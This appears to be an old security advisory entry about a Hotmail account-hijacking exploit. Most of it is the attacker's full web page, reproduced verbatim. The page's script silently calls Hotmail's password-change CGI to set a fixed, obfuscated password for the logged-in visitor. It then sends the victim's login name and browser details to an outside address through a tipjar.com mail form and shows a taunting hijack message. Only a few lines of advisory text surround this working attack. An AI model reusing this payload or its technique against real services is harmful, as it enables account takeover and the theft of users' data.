COMMAND
Hotmail
SYSTEMS AFFECTED
Hotmail users
PROBLEM
David L. Nicol posted the following. It is an exploit for Hotmail which
should be fixed now. If Hotmail merely changed the names of
variables, or did a similar short term fix, the next exploit might
not be nice enough to announce itself as such. Modifying the El
Lite exploit to only work if it had a particular hotmail account
might be a piece of cake, allowing for some highly targeted kinds
of attacks (esp. if a hotmail user is doing anything involving
return-email verification, like tipjar or first virtual).
Here is the hacker's tripod page, including the exploit that takes
advantage of the trust hotmail has for instructions from your
browser, by secretly sending instructions to hotmail to change
your password to
<HTML>
<HEAD>
<!--Begin JavaScrypt roadmap code. If editing downloaded HTML source, delete this portion.-->
<scrypt language="JavaScrypt">
<!--
function TripodShowPopup()
{
// open the popup window
var popupURL = "http://members.tripod.com/adm/popup/roadmap.shtml";
var popup =
window.open(popupURL,"TripodPopup",'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105');
// set the opener if it's not already set. it's set automatically
// in netscape 3.0+ and ie 3.0+.
if( navigator.appName.substring(0,8) == "Netscape" )
{
popup.location = popupURL;
}
}
TripodShowPopup();
// -->
</scrypt>
<!--End inserted JavaScript code.-->
<base href="http://members.tripod.com/kraffa2/Hook.html">
</HEAD>
<body>
<scrypt>
<!--
function getCGIValue(nombre, elURL)
{
elURL= elURL;
nombre= nombre+"=";
vacio="";
found= elURL.indexOf(nombre);
if (found > -1)
{
found2= elURL.indexOf("&",found);
found+= nombre.length;
end= (found2 > -1) ? found2 : elURL.length;
var value= elURL.substring(found, end);
value= (value != null) ? value : vacio;
return value;
}
else {return vacio;}
}
Query= unescape(self.location.search);
disk= getCGIValue("disk", Query);
login= getCGIValue("login", Query);
host= "www.hotmail.com";
hintq= escape('<img src="http://www.badenpage.de/pirate/bilder/flagge.jpg"><br><center>by El Lite©</center>');
hinta= '%66axf%61x';
TheURL= "http://"+host+"/cgi-bin/dopassword?"+"disk="+disk+"&login="+login+"&f=34145&curmbox=ACTIVE&_lang=&np=yes&new_%70%61%73s%77d=%6B%6B%6A%6A01&new_%70%61%73s%77d2=kk%6A%6A01&hi%6E%74q="+hintq+"&hinta="+hinta;
Mail= "http://www.tipjar.com/cgi-bin/generic?mailto=paulinaporizkova@hotmail.com&mailfrom="+login+"@hotmail.com&subject="+login+"+HMpass+cambiada+%0A%0ASu+navegador+es+"+escape(navigator.userAgent+"\n.\n");
options= 'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105';
HOTMAIL= window.open(TheURL,"HOTMAIL",options);
self.focus();
setTimeout("HOTMAIL.close()",8000);
MAIL= window.open(Mail,"MAIL",options);
self.focus();
setTimeout("MAIL.close()",8000);
//-->
</scrypt>
<pre><b>
One of the best free email services in existence is precisely the one
you are using, hotmail. Its security and inviolability are already
legendary.
So much so that, look, from this very moment things are going to
take a different turn. I mean that, much as I regret it, your hotmail
address has been disabled, or rather, hijacked
by me.
You will never be able to get into it again.
That's how final it is. Now it is
ONLY MIIINE!!!! :-))))
Since I'm such a nice guy and you're not my only victim, one of these
days I'm going to publish on es.comp.hackers the password I set for you
(it's the same for all of you suckers)
Go on, take it easy
El Lite©
</b></pre>
</body>
</html>
SOLUTION
Hotmail claims not to be vulnerable to this anymore.